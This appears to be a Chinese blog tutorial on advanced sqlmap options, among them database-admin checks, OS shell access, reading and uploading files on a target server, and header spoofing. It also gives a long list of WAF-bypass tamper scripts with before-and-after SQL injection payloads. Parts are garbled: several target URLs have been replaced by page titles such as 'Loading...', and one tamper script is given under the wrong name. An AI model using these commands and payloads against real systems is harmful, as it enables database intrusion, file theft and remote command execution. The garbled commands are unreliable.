sqlmap命令扩展

--level 5:探测等级

参数 –level 5指需要执行的测试等级,一共有5个等级(1-5),可以不用加level,默认是1.sqlmap使用payload可以在xml/payloads.xml中看到,也可以根据相应的格式添加自己的payload,其中5级包含的payload最多,会自动破解出cookie、新方法、等头部注入。当然,level 5的运行速度也比较慢。

这个参数会影响测试的注入点,get和post的数据都会进行测试,http cookie在level为2的时候就会测试,http user-agent/referer头在level为3的时候就会测试。总之,在不确定哪个payload或者参数为诸如点时,为了保证全面性,建议使用高的level值。

 --is-dba: 当前用户是否为管理权限

该命令用于查看当前账户是否为数据库管理员账户,如果是则返回true。

python sqlmap.py -u Loading... --is-dba

### --referer:HTTP Referer头

sqlmap可以在请求中伪造http中的referer,当level参数设定在3及3以上时,会尝试对referer头注入。可以使用referer命令来欺骗,如:--referer 百度一下,你就知道

```

sqlmap.py -u  Loading...  --referer 百度一下,你就知道

```

意思就是欺骗目标我是从http//www.baidu.com发起的探测,如果不欺骗是从本机发起的探测

--sql-shell:运行自定义sql语句

该命令用于执行指定的sql语句

sqlmap.py -u  gxalabs.com - 该网站正在出售! - gxalabs 资源和信息。  --sql-shell

如:

sql-shell> select version()

sql-shell> select database()

 --os-cmd,--os-shell:运行任意操作系统命令

该命令用于执行任意操作系统命令,如下所示

```

sqlmap.py -u  Loading... --os-shell

```

请特别注意:

使用该命令有几个必须具备的条件

1.数据库用户是dba权限

2.知道网站的绝对路径

3.php当中的gpc为off(php自动转义的功能为关闭状态)

4.就算具备以上3个条件,因为设计到系统命令,也未必可以执行成功

 --file-read:从数据库服务器中读取文件

该命令用于读取文件

```

sqlmap.py -u  Loading... --file-read   "C:/1.txt"

```

 --file-write,--file-dest:上传文件到数据库服务器中

该命令用于写入本地文件到服务器中,当数据库为MySQL、PostgreSQL或SQL Server,并且当用户有权限使用特定的函数时,上传的文件可以是文本,也可以是二进制文件。

```

sqlmap.py -u   Loading... --file-write “上传文件路径(相对路径)” --file-dest “目标文件系统绝对路径”

#将本地的test.txt文件上传到目标服务器的E盘下,并且名字为hack.txt

sqlmap -u "http://192.168.10.1/sqli/Less-4/?id=1" --file-write  test.txt  --file-dest "e:/hack.txt" 

```

 --random-agent

选择随机user-agents头        (系统,访问过快封Ip)

--delay=1

 每次探测延时1秒(防止访问过快被....)

#### --flush-session

清理缓存,重新检测

 --technique

指定注入类型

```

U:联合

E:报错

B:布尔

T:时间

S:堆叠/多语句

```

--dbms

指定数据库类型

```

--dbms mysql/mssql/orcale

```

 --threads

```

指定线程数,默认为1,最大为10

```

--banner

查看数据库版本信息

## 自带绕WAF模块

自带的tamper模块在安装目录下的tamper下面,全部是py写的。

### 检测是否存在waf

```plain

# 新的版本已经废弃,老的版本可探测

sqlmap -u 网址 --identify-waf

```

### 常用脚本

用法:

```plain

sqlmap -u [url] --tamper [模块名]

```

 apostrophemask.py

```plain

适用数据库:ALL

作用:将引号替换为utf-8,用于过滤单引号

使用脚本前:tamper("1 AND '1'='1")

使用脚本后:1 AND %EF%BC%871%EF%BC%87=%EF%BC%871

```

 base64encode.py

```plain

适用数据库:ALL

作用:替换为base64编码

使用脚本前:tamper("1' AND SLEEP(5)#")

使用脚本后:MScgQU5EIFNMRUVQKDUpIw==

```

multiplespaces.py

```plain

适用数据库:ALL

作用:围绕sql关键字添加多个空格

使用脚本前:tamper('1 UNION SELECT foobar')

使用脚本后:1 UNION SELECT foobar

```

space2plus.py

```plain

适用数据库:ALL

作用:用加号替换空格

使用脚本前:tamper('SELECT id FROM users')

使用脚本后:SELECT+id+FROM+users

```

 nonrecursivereplacement.py

```plain

适用数据库:ALL

作用:作为双重查询语句,用双重语句替代预定义的sql关键字(适用于非常弱的自定义过滤器,例如将select替换为空)

使用脚本前:tamper('1 UNION SELECT 2--')

使用脚本后:1 UNIOUNIONN SELESELECTCT 2--

```

space2randomblank.py

```plain

适用数据库:ALL

作用:将空格替换为其他有效字符

使用脚本前:tamper('SELECT id FROM users')

使用脚本后:SELECT%0Did%0DFROM%0Ausers

```

 unionalltounion.py

```plain

适用数据库:ALL

作用:将union allselect 替换为unionselect

使用脚本前:tamper('-1 UNION ALL SELECT')

使用脚本后:-1 UNION SELECT

```

 securesphere.py

```plain

适用数据库:ALL

作用:追加特定的字符串

使用脚本前:tamper('1 AND 1=1')

使用脚本后:1 AND 1=1 and '0having'='0having'

```

 space2dash.py

```plain

适用数据库:ALL

作用:将空格替换为--,并添加一个随机字符串和换行符

使用脚本前:tamper('1 AND 9227=9227')

使用脚本后:1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227

```

space2mssqlblank.py

```plain

适用数据库:Microsoft SQL Server

测试通过数据库:Microsoft SQL Server 2000、Microsoft SQL Server 2005

作用:将空格随机替换为其他空格符号('%01', '%02', '%03', '%04', '%05', '%06', '%07', '%08', '%09', '%0B', '%0C', '%0D', '%0E', '%0F', '%0A')

使用脚本前:tamper('SELECT id FROM users')

使用脚本后:SELECT%0Eid%0DFROM%07users

```

between.py

```plain

测试通过数据库:Microsoft SQL Server 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0

作用:用NOT BETWEEN 0 AND #替换>

使用脚本前:tamper('1 AND A > B--')

使用脚本后:1 AND A NOT BETWEEN 0 AND B--

```

percentage.py

```plain

适用数据库:ASP

测试通过数据库:Microsoft SQL Server 2000, 2005、MySQL 5.1.56, 5.5.11、PostgreSQL 9.0

作用:在每个字符前添加一个%

使用脚本前:tamper('SELECT FIELD FROM TABLE')

使用脚本后:%S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E

```

 sp_password.py

```plain

适用数据库:MSSQL

作用:从T-SQL日志的自动迷糊处理的有效载荷中追加sp_password

使用脚本前:tamper('1 AND 9227=9227-- ')

使用脚本后:1 AND 9227=9227-- sp_password

```

 charencode.py

```plain

测试通过数据库:Microsoft SQL Server 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0

作用:对给定的payload全部字符使用url编码(不处理已经编码的字符)

使用脚本前:tamper('SELECT FIELD FROM%20TABLE')

使用脚本后:%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45

```

 randomcase.py

```plain

测试通过数据库:Microsoft SQL Server 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0

作用:随机大小写

使用脚本前:tamper('INSERT')

使用脚本后:INseRt

```

 charunicodeencode.py

```plain

适用数据库:ASP、ASP.NET

测试通过数据库:Microsoft SQL Server 2000/2005、MySQL 5.1.56、PostgreSQL 9.0.3

作用:适用字符串的unicode编码

使用脚本前:tamper('SELECT FIELD%20FROM TABLE')

使用脚本后:%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045

```

 space2comment.py

```plain

测试通过数据库:Microsoft SQL Server 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0

作用:将空格替换为/**/

使用脚本前:tamper('SELECT id FROM users')

使用脚本后:SELECT/**/id/**/FROM/**/users

```

equaltolike.py

```plain

测试通过数据库:Microsoft SQL Server 2005、MySQL 4, 5.0 and 5.5

作用:将=替换为LIKE

使用脚本前:tamper('SELECT * FROM users WHERE id=1')

使用脚本后:SELECT * FROM users WHERE id LIKE 1

```

 equaltolike.py

```plain

测试通过数据库:MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0

作用:将>替换为GREATEST,绕过对>的过滤

使用脚本前:tamper('1 AND A > B')

使用脚本后:1 AND GREATEST(A,B+1)=A

```

ifnull2ifisnull.py

```plain

适用数据库:MySQL、SQLite (possibly)、SAP MaxDB (possibly)

测试通过数据库:MySQL 5.0 and 5.5

作用:将类似于IFNULL(A, B)替换为IF(ISNULL(A), B, A),绕过对IFNULL的过滤

使用脚本前:tamper('IFNULL(1, 2)')

使用脚本后:IF(ISNULL(1),2,1)

```

 modsecurityversioned.py

```plain

适用数据库:MySQL

测试通过数据库:MySQL 5.0

作用:过滤空格,使用mysql内联注释的方式进行注入

使用脚本前:tamper('1 AND 2>1--')

使用脚本后:1 /*!30874AND 2>1*/--

```

 space2mysqlblank.py

```plain

适用数据库:MySQL

测试通过数据库:MySQL 5.1

作用:将空格替换为其他空格符号('%09', '%0A', '%0C', '%0D', '%0B')

使用脚本前:tamper('SELECT id FROM users')

使用脚本后:SELECT%0Bid%0DFROM%0Cusers

```

 modsecurityzeroversioned.py

```plain

适用数据库:MySQL

测试通过数据库:MySQL 5.0

作用:使用内联注释方式(/*!00000*/)进行注入

使用脚本前:tamper('1 AND 2>1--')

使用脚本后:1 /*!00000AND 2>1*/--

```

 space2mysqldash.py

```plain

适用数据库:MySQL、MSSQL

作用:将空格替换为 -- ,并追随一个换行符

使用脚本前:tamper('1 AND 9227=9227')

使用脚本后:1--%0AAND--%0A9227=9227

```

 bluecoat.py

```plain

适用数据库:Blue Coat SGOS

测试通过数据库:MySQL 5.1,、SGOS

作用:在sql语句之后用有效的随机空白字符替换空格符,随后用LIKE替换=

使用脚本前:tamper('SELECT id FROM users where id = 1')

使用脚本后:SELECT%09id FROM users where id LIKE 1

```

 versionedkeywords.py

```plain

适用数据库:MySQL

测试通过数据库:MySQL 4.0.18, 5.1.56, 5.5.11

作用:注释绕过

使用脚本前:tamper('1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))#')

使用脚本后:1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS*//*!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#

```

 halfversionedmorekeywords.py

```plain

适用数据库:MySQL < 5.1

测试通过数据库:MySQL 4.0.18/5.0.22

作用:在每个关键字前添加mysql版本注释

使用脚本前:tamper("value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa")

使用脚本后:value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa

```

 space2morehash.py

```plain

适用数据库:MySQL >= 5.1.13

测试通过数据库:MySQL 5.1.41

作用:将空格替换为#,并添加一个随机字符串和换行符

使用脚本前:tamper('1 AND 9227=9227')

使用脚本后:1%23ngNvzqu%0AAND%23nVNaVoPYeva%0A%23lujYFWfv%0A9227=9227

```

 apostrophenullencode.py

```plain

适用数据库:ALL

作用:用非法双字节Unicode字符替换单引号

使用脚本前:tamper("1 AND '1'='1")

使用脚本后:1 AND %00%271%00%27=%00%271

```

 appendnullbyte.py

```plain

适用数据库:ALL

作用:在有效载荷的结束位置加载null字节字符编码

使用脚本前:tamper('1 AND 1=1')

使用脚本后:1 AND 1=1%00

```

 chardoubleencode.py

```plain

适用数据库:ALL

作用:对给定的payload全部字符使用双重url编码(不处理已经编码的字符)

使用脚本前:tamper('SELECT FIELD FROM%20TABLE')

使用脚本后:%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545

```

unmagicquotes.py

```plain

适用数据库:ALL

作用:用一个多字节组合%bf%27和末尾通用注释一起替换空格

使用脚本前:tamper("1' AND 1=1")

使用脚本后:1%bf%27 AND 1=1--

```

 randomcomments.py

```plain

适用数据库:ALL

作用:用注释符分割sql关键字

使用脚本前:tamper('INSERT')

使用脚本后:I/**/N/**/SERT

```

  • 17
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值